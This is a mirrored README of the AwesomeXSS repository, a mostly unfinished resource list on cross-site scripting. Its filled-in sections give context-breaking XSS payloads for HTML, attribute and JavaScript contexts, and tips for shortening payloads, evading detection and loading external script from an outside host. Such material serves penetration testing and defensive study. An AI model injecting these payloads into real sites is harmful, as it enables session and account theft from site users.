Mirror of https://github.com/s0md3v/AwesomeXSS
README.md |
AwesomeXSS
Awesome XSS stuff. Put this repo on watch. I will be updating it regularly.
Awesome Books
Awesome Websites
Awesome People
- Rodolfo Assis
- Ashar Javed
- Somdev Sangwan I own this repo, I can write whatever the fuck I want :v
Awesome Reads
Awesome Presentations
- How I met your girlfriend
- How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour
- Blind XSS
- Copy Pest
Awesome Context Breaking
Simple Context
<svg onload=alert()>
</tag><svg onload=alert()>
Attribute Context
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
JavaScript Context
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
Awesome Payloads
Come back later
Awesome Exploits
Come back later
Awesome Tags & Event Handlers
Come back later
Awesome Methodology
Come back later
Awesome Tools
Awesome Tips & Tricks
- http:// can be shortened to //
- document.cookie can be shortened to cookie. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing alert(1) and start doing alert()
- I have found that confirm is the least detected pop-up function so stop using alert.
- Quotes around attribute value aren't neccessary. You can use <script src=//14.rs> instead of <script src="//14.rs"&glt;
- The shortest independent payload is <embed src=//14.rs> (19 chars)
Credits and all that
All the payloads are crafted by me unless specified. Thanks to my big brother Rodolfo Assis whose writings inspired me to become an XSSLord.